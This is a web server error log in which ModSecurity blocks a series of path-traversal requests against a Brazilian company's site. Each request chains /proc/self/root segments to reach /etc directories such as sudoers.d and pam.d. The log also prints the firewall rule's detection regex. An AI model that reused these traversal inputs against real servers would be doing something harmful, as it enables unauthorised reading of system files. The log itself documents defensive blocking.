[Mon Mar 16 11:29:03.627602 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:37106] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTr7ysWC90G-1nBrA8-gAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:04.901106 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.243.203:37114] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTsHjZBu2q05ozVU9OpQAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:06.132259 2026] [access_compat:error] [pid 21533:tid 140411725141760] [client 185.177.72.22:44514] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/info.php
[Mon Mar 16 11:29:06.187272 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.243.203:37128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTsrysWC90G-1nBrA8_AAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:07.499371 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:37136] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTs5qj1wV0Si-Okefj9gAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:08.854239 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:37142] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTtJqj1wV0Si-Okefj9wAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:10.872486 2026] [:error] [pid 11972:tid 140411666392832] [client 74.7.243.203:38130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTtpqj1wV0Si-Okefj-QAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:12.166823 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:38144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTuJqj1wV0Si-Okefj-gAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:13.484907 2026] [:error] [pid 32654:tid 140411607643904] [client 74.7.243.203:38150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTuQlT9VtDQc7bgUym8gAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:14.781511 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.243.203:38156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTutSswJuvopo3lOhX-QAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:15.906105 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:38170] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTu3bQATo66fKoS7xGLQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:17.185938 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.243.203:38178] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTvRXjF1vJNtV6CWrv1gAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:19.513417 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:38180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTv7ABkC4fWIHEf8HjcgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:20.810603 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:53130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTwI6lpbStxTqkSktljgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:21.991838 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:53144] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTwY6lpbStxTqkSktljwAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:23.319412 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:53148] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTw46lpbStxTqkSktlkQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:24.496569 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:53152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTxP9ocpUE4ed4uDznWQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:25.766312 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:53154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTxXbQATo66fKoS7xGLwAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:26.895278 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:53166] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTxv9ocpUE4ed4uDznXQAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:28.163119 2026] [:error] [pid 11972:tid 140411716749056] [client 74.7.243.203:53168] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTyJqj1wV0Si-Okefj_AAAAAM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:29.458999 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:53176] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTybABkC4fWIHEf8HjcwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:29:30.635771 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:37016] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgTytSswJuvopo3lOhYAAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
